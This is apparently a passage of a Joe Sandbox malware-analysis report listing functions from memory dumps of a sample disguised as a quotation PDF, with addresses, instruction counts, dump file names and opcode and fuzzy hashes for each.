Opcode ID: 71a2da6525dbf11cc02a6166d82373b6f898c36df467bd0a34294ee01017cc73
Instruction ID: 5347245a2040914aa43a5d270f99ec0d03ebc70353be5a5bfc092c9b19bf4206
Opcode Fuzzy Hash: 71a2da6525dbf11cc02a6166d82373b6f898c36df467bd0a34294ee01017cc73
Instruction Fuzzy Hash: 8151AE31E4C9494FEBA8EA28D851BAC7BA2FF45390F0401B9D90DD7293DE35AE46C741

Function 00007FF887CD5143 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0feda36ee52fd1861fec8a92992c50207f385966f1310662c20a1ac9b946523b
Instruction ID: befe65f07fa680273e8e86a63561c7d7f2edada21bc68bcc139cb974e7106966
Opcode Fuzzy Hash: 0feda36ee52fd1861fec8a92992c50207f385966f1310662c20a1ac9b946523b
Instruction Fuzzy Hash: DA519131A4894D8FDB99EF6CD851AAD3BF2FF99350B0501B9E00DC7296DA34E841CB81

Function 00007FF887AF8FC0 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf87f1f873f8f740a8aa1baf3d331a672ed16848fc754424268cabd9e8e11aed
Instruction ID: f0029af64db80fb36e291c85aedb3850f94f8acf4f004643e09ddbdcf4f0b696
Opcode Fuzzy Hash: cf87f1f873f8f740a8aa1baf3d331a672ed16848fc754424268cabd9e8e11aed
Instruction Fuzzy Hash: 3F518E31908A4D8FEF54EFA8D455AECBBF1FF59354F14017AD40DE72A2CA286881C792

Function 00007FF887AF3C6E Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242ce64c02e45cafc0c19df26dc859622075dfcf37b57a99481a010caaa7d96b
Instruction ID: 043144634fd4b20bee22a1d247f7e6449082fe46015e594b866ecdc6a98a5768
Opcode Fuzzy Hash: 242ce64c02e45cafc0c19df26dc859622075dfcf37b57a99481a010caaa7d96b
Instruction Fuzzy Hash: 63412421A4E3C51FD31A9A2498525B67FB5EF87360B0A46FFD08AC72A3DD1898078352

Function 00007FF887AF3BD6 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80ff9270571a0dbf92968c954f369bb9d49d6759ce8de7b22edabb2fe4cc019
Instruction ID: 7a0fbf2f1a632e117297590357a626bb843f1095e312c1cf5e15d862484bad5b
Opcode Fuzzy Hash: e80ff9270571a0dbf92968c954f369bb9d49d6759ce8de7b22edabb2fe4cc019
Instruction Fuzzy Hash: FF413421A4E2C50FE31A56249C222B97FB5EF43360F0A06BFD08AC72D3DD195807C352

Function 00007FF887AF8FF8 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8df05cf81b3e1a6afa7561875be2c2aca62ba5cd782ae7247ec57e5956a003cf
Instruction ID: 23c6a939f07792ae9a30788907995d884a971daffe421edac7680785b85725b5
Opcode Fuzzy Hash: 8df05cf81b3e1a6afa7561875be2c2aca62ba5cd782ae7247ec57e5956a003cf
Instruction Fuzzy Hash: A351C170908A8D8FDB59EFA8C855AEDBBF1FF59344F1401BAD04DE72A2CA386841C741

Function 00007FF887AF9AD3 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30360d66b73a22a89602c854a96a773348c98553a354dc5cd4765b948213b66
Instruction ID: 5c0ab4eccf2a21792ace0653b340f7adb0635344da93f82fafab451057233b79
Opcode Fuzzy Hash: d30360d66b73a22a89602c854a96a773348c98553a354dc5cd4765b948213b66
Instruction Fuzzy Hash: 0251DD31A4C55A8FEB45DBA8C8506FEBBF2FF55364F0401BAC049E7192CE386911CB91

Function 00007FF887CE3D68 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceab3941ca9725f39a0c3a932acc0e5797db2440c37adeaf0168981fbc7c3e9f
Instruction ID: a62c6e888a4cd54c787620afb41ebefccbf67991f6eb752ef346d655f6e0e38f
Opcode Fuzzy Hash: ceab3941ca9725f39a0c3a932acc0e5797db2440c37adeaf0168981fbc7c3e9f
Instruction Fuzzy Hash: FC510631A18A5D8FDF98EF98D495AEDBBF2FF98340F14016AD40DE7291CA35A841CB41

Function 00007FF887CD43F5 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9670b040de0f70d7c6856c020e7dad9fd7048e350d152260369b8cf10f98c7f9
Instruction ID: 08e4a838b6b555f256bb58821f9c0aa21fcaff83542891309f274e83ee1189ca
Opcode Fuzzy Hash: 9670b040de0f70d7c6856c020e7dad9fd7048e350d152260369b8cf10f98c7f9
Instruction Fuzzy Hash: 5341E430A4895D8FDFA8EA18C891BAC77B2FF99340F5041B8D40DD7292DA34AD86CB40

Function 00007FF887CD39FB Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38e7c5b0fb3c594a75332a082d565f0f4c5da9e0627832ee8eef4be93dc5df4b
Instruction ID: 314cb7309353547db4c4dfa96b6ac71a30f6fc65c00335b2183311065399f7a6
Opcode Fuzzy Hash: 38e7c5b0fb3c594a75332a082d565f0f4c5da9e0627832ee8eef4be93dc5df4b
Instruction Fuzzy Hash: AC318220B58D599FF7A8EB6C8459B793BE2FF99780B1401B9D40DC3293DD29AC42C781

Function 00007FF887CDCB3F Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06a9363b958039e6f8e6ff1e9ddd67669189b9a5e09fe27c34866766242f800
Instruction ID: a3122b4fa7e2dd1059bc28354a5b08b695aa39475c774a210424cf5de0851462
Opcode Fuzzy Hash: f06a9363b958039e6f8e6ff1e9ddd67669189b9a5e09fe27c34866766242f800
Instruction Fuzzy Hash: 87311331C9CA865FE3BA962894622B93FF2FF55384F0800BEC449C75D3D92DA846C342

Function 00007FF887CD23B0 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e7bd6f5cc7ab61fe6c70e6dc80586a5048a1db9c444c24f34ad03dfb3b6c1f5
Instruction ID: 6ebfd520e121f85bd8d47cba227b94380f1a323dabe59e3b4bbe83cc26482fe8
Opcode Fuzzy Hash: 3e7bd6f5cc7ab61fe6c70e6dc80586a5048a1db9c444c24f34ad03dfb3b6c1f5
Instruction Fuzzy Hash: 9831A631A4C9094FEBB8DA1CC44AA797BE2FF58351F140579D99DC32A2DB18AC86C781

Function 00007FF887CD1E69 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a5afb4ad0b577913aa6e07cd646de61303c025154c0828c2b8c903e4e717e0
Instruction ID: 470121b3e913e2d398026a0308beb693227dfccd3ac732a4a30d4c6beac3c1ec
Opcode Fuzzy Hash: e7a5afb4ad0b577913aa6e07cd646de61303c025154c0828c2b8c903e4e717e0
Instruction Fuzzy Hash: 9431D320F4CA864FE7A5DB2D98646BC2BE2FF49755B4500BAE089C72D3DE18EC41C201

Function 00007FF887CD55A5 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f93ad97b7699c666ad22419c405201940ea82655b85edf12ed36d6626c79e5
Instruction ID: 99109991a0e72eddf6a9edb163e296fb775a23081b7fc18aaf12be0710a032d3
Opcode Fuzzy Hash: e0f93ad97b7699c666ad22419c405201940ea82655b85edf12ed36d6626c79e5
Instruction Fuzzy Hash: CF31A43074CA894FD795EB2CD495AB97BE2FF99310B1405BAE04DC76A3CA29DC42C781

Function 00007FF887AF1EB0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfce0b1b9f8eb874ceb6fab2a1794aed038dcf5a7f7d73b24c75f4d1c849006d
Instruction ID: f188d41e699198b4863d85c9a6f7ffd51eba68b2baffd921660380018af54575
Opcode Fuzzy Hash: dfce0b1b9f8eb874ceb6fab2a1794aed038dcf5a7f7d73b24c75f4d1c849006d
Instruction Fuzzy Hash: 3131D871A4CA494FE389CB6CC46577D7BF1FF95350B5845BAC14DC72A2DA28D805C701

Function 00007FF887AF1EA1 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59aec1ab4dbf7024f6c257c25782bf58cf003465d09003ebd9605e9579e929f
Instruction ID: 67aca9e08e83f5e72b428a5175b6b5db434b5353b1b45551475de4cde0cd3dea
Opcode Fuzzy Hash: f59aec1ab4dbf7024f6c257c25782bf58cf003465d09003ebd9605e9579e929f
Instruction Fuzzy Hash: BB21AE61B4CA4A8FE389CA6C845963D77E2FFD9390B5445BAC14DC72A2DE28D805C302

Function 00007FF887AF1EBF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26cd23afdcd8b00e546b9c40e38516cc1de375746b4686c2c63f9172710df8eb
Instruction ID: b50f2dff920a127c8902873d28241a3c56ae5e312c094fbd030dac6d1d069202
Opcode Fuzzy Hash: 26cd23afdcd8b00e546b9c40e38516cc1de375746b4686c2c63f9172710df8eb
Instruction Fuzzy Hash: E831BF61A4CA4A8FE389CB2C845667D77E2FFD9390B5441BAD24DC72A2DE28D805C702

Function 00007FF887AF1EDD Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f490a0cdd88cb9b61773b268c33e59be42ba39762fa1ca7a2eb816446182e21e
Instruction ID: 08fdd4aa0a74abfbb5e1b5e8c52f85e355f6595d0e3bc1bc64781fe0614b0603
Opcode Fuzzy Hash: f490a0cdd88cb9b61773b268c33e59be42ba39762fa1ca7a2eb816446182e21e
Instruction Fuzzy Hash: 3921E471A4CA894FE389DB6C841967D77E2FF99350B5845BBD24DC72A2DE28DC04C701

Function 00007FF887AF1B43 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8b2aa0b970d52cec49c5d70aa4de42b1cba18310de80480ba454f95e02bc6f
Instruction ID: 54a642302fe21360f65530d224bd246825195980a39ce049793b3549f3e7fd7e
Opcode Fuzzy Hash: ac8b2aa0b970d52cec49c5d70aa4de42b1cba18310de80480ba454f95e02bc6f
Instruction Fuzzy Hash: 6E211D31A488098FEF98EB5CD456ABC77F1EF98361F01017AD00ACB2A5DA64A842C740

Function 00007FF887CDFCC2 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571a1ffa4cb851c53893fae87226d9de440c24f4a098c6dc33951b8323adf1f8
Instruction ID: b95820cd388d32e0cce814b84b8a89a38facf83c38ba19710cf479dcbb5d6396
Opcode Fuzzy Hash: 571a1ffa4cb851c53893fae87226d9de440c24f4a098c6dc33951b8323adf1f8
Instruction Fuzzy Hash: E6319830A489498FEBB4DA18CC646AEBBF2FF95341F1405FAC40CD7292DA346986CF41

Function 00007FF887AF1ECE Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926ddb629fd620d5ff91d7009d95a3ea76a0a0797401336a1eea61dc6eee62eb
Instruction ID: 3ac624d7edf2bc24227acf77c41d4b7cf8fe233a18585262dc4569b4c4edd6a1
Opcode Fuzzy Hash: 926ddb629fd620d5ff91d7009d95a3ea76a0a0797401336a1eea61dc6eee62eb
Instruction Fuzzy Hash: F921B061F48A4A4FE389CB2C845963D76E2FFE9390B54417BD24DC72A2DE24D805C702

Function 00007FF887CD455E Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a40ce9d755ec43520dc59be6d3e62509148b921be8a3a01da52cf01f1815b7
Instruction ID: 2ac990cf84383c37d8f58ac7fa7851e25b2759db0662931ec5ee196b2a5d38ee
Opcode Fuzzy Hash: 94a40ce9d755ec43520dc59be6d3e62509148b921be8a3a01da52cf01f1815b7
Instruction Fuzzy Hash: 4F21C532A4CA498FEBE1EA6CE8416E87BE1FF55351F0500B6D90EC7193EA259A52C740

Function 00007FF887AF07FA Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd184bb86e28d63b4a6c2a79e8a46da3ba0aabeb6e315abc8554fe8c6b5399f
Instruction ID: 4aa5bd1a6c3bdc632e44cb7589ffbdad5c5b4d88e32b9292f791e54ee6a1e978
Opcode Fuzzy Hash: bcd184bb86e28d63b4a6c2a79e8a46da3ba0aabeb6e315abc8554fe8c6b5399f
Instruction Fuzzy Hash: F521621764D2D61FD712AB6CA8A12EA3F70EF872A570D01F3D5D8CE093D908648BC392

Function 00007FF887AF07C5 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fef55121e6caa57c3d676b73070427a77885c526ffb2907b7f6eff3a4adc653
Instruction ID: 4181c532b6271628d4a09ba15e75a458c6b92258741f1741fa904f03fa083e1a
Opcode Fuzzy Hash: 1fef55121e6caa57c3d676b73070427a77885c526ffb2907b7f6eff3a4adc653
Instruction Fuzzy Hash: 7D21601764D2D61FD712AA2CA8A51EE3F70EF962A570901F3D6D8CE193DA08544BC392

Function 00007FF887AF0CFF Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff267e9347f62b667f033c53e04d4f2d6278cbedb06e105373399c2a8049745
Instruction ID: 08cc9722d7a82266244a56f0ba406e9455319a95c4bfa92d40d31e93e8c70d48
Opcode Fuzzy Hash: 7ff267e9347f62b667f033c53e04d4f2d6278cbedb06e105373399c2a8049745
Instruction Fuzzy Hash: C611CB31A4890D8FEF98EB5CA8966BDB7F1FF98351F54023AD01DD3286DE2968428750

Function 00007FF887AF93FA Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4720486878dce30d2795ddd501b678daa39f7648e8c65d6c41fbfd5c4513e4c1
Instruction ID: fd96ce69773fdcdb9edba19f7e420e363ec6b5c05d235fb1c9614a13a25938f9
Opcode Fuzzy Hash: 4720486878dce30d2795ddd501b678daa39f7648e8c65d6c41fbfd5c4513e4c1
Instruction Fuzzy Hash: AA218D71D4D2898FE7069B6488556ED7BB0BF25340F0401BAC855DB2D2CA7C6948CB52

Function 00007FF887AFAEC6 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f016286e56f87a24ff2b74f1ec65d19cfbc86e04daa4a9e4915d2e5795520177
Instruction ID: 6c397015333fdc72c255be8f03443b3eb159490b6478e56a6c3ec0ca6a552831
Opcode Fuzzy Hash: f016286e56f87a24ff2b74f1ec65d19cfbc86e04daa4a9e4915d2e5795520177
Instruction Fuzzy Hash: 7921B83090891D8FDF98EB14C855BE9B7F0FB68341F5081AAD04DE3294CE719A848F81

Function 00007FF887AF9AD0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6fa1cce8d0f033baf3ac3f591153fde857c6431a45897717c58e7bcd8da6e4
Instruction ID: e4eef4c3ead1cde92b74e6237908c597d8453809fd383723ed78625fe14147ad
Opcode Fuzzy Hash: 1d6fa1cce8d0f033baf3ac3f591153fde857c6431a45897717c58e7bcd8da6e4
Instruction Fuzzy Hash: 6611AF30A8C55E8BEB44DB6894516FE7BB2FF953A0F00017AD449E2191CE286950CB91

Function 00007FF887AF0648 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b7d960e234ef6bc74d7a3fd79037609b36170e2839d8068a41bf517367e3445
Instruction ID: 824025364b2e69e28ca45879f81de4bf73c4b8c98cb2c6a994f0ace47740588f
Opcode Fuzzy Hash: 7b7d960e234ef6bc74d7a3fd79037609b36170e2839d8068a41bf517367e3445
Instruction Fuzzy Hash: 8701B522A8DA290EF678911C7C4B2BE66D5EB96271F04123FD88AC1586E95668838180

Function 00007FF887AF0C65 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd878cc277eee79dafb8e725cd1f48a72d966e995c7d8b02789868eb7c9c4dd
Instruction ID: b969c4ee2cdd7b3ac1b3b438ac0a4efa9ddcf6fa2a128b337889b876e199f085
Opcode Fuzzy Hash: bbd878cc277eee79dafb8e725cd1f48a72d966e995c7d8b02789868eb7c9c4dd
Instruction Fuzzy Hash: 5C113C11F54E594FABC8E7B8989A3BD52E2FF9C691B40047AE40ED72C3DD6C6C418341

Function 00007FF887CD0120 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85d91a48cddd9dc5d1260a0a153c725dad3745f2fc4ed3b7b60f251187ced4c8
Instruction ID: 25b78d02bcc6c6f35fff489b4ab94a773e4eaffcf97da8fb48008bbf55959681
Opcode Fuzzy Hash: 85d91a48cddd9dc5d1260a0a153c725dad3745f2fc4ed3b7b60f251187ced4c8
Instruction Fuzzy Hash: 6901A121A28E0D0BD768B7589445BFBB7E1EBA8354F00463EE44EC3196DE79B8458381

Function 00007FF887CD17EC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2092575ab5f0898c92bb318c99dc83b18a03e4844c8c0880685d2ff48a140264
Instruction ID: 7708e2544c9e164197a9efea9afd086fd5c7d601d7d530016286c075ffa00ff7
Opcode Fuzzy Hash: 2092575ab5f0898c92bb318c99dc83b18a03e4844c8c0880685d2ff48a140264
Instruction Fuzzy Hash: C70108A6E8C6824BF3685958A8131B92BF2FBA1350F01017BC88987597DC2924438342

Function 00007FF887AF92E8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa02c0e5a36d44607531fbbabf683cc24844d70fe1de5ae7f3fe46f5d2806b40
Instruction ID: c25402dd3be888e93695f0f982a7f85724a8504e057fe253e803aa8f7c921004
Opcode Fuzzy Hash: aa02c0e5a36d44607531fbbabf683cc24844d70fe1de5ae7f3fe46f5d2806b40
Instruction Fuzzy Hash: DD11393194891E8BDF54EF98D8156FEB7B5FB98351F04003AE51DE3280CA79A954CBC1

Function 00007FF887AF3914 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7218d29153492a6162b909906f19c84281c989442400958ac5c4ba462551e7e8
Instruction ID: 41d069a1ef0a391eb2731d60d3c6cc86058866475c692ef96ba6802ae0c1c93f
Opcode Fuzzy Hash: 7218d29153492a6162b909906f19c84281c989442400958ac5c4ba462551e7e8
Instruction Fuzzy Hash: 15119D34D8920A8FEB59DB58C1526FCB7B0FF49384F2040BAC10EE71C2DA3A6845CB61

Function 00007FF887AF2314 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdff02ec4857cb00af32de3f982243305c8faa5e82d258c7ed773600ea2ca410
Instruction ID: 6ed6634dd8b9d58c919eda45f9ab4a96a42e4591a48a941c043d695d988a2e1c
Opcode Fuzzy Hash: fdff02ec4857cb00af32de3f982243305c8faa5e82d258c7ed773600ea2ca410
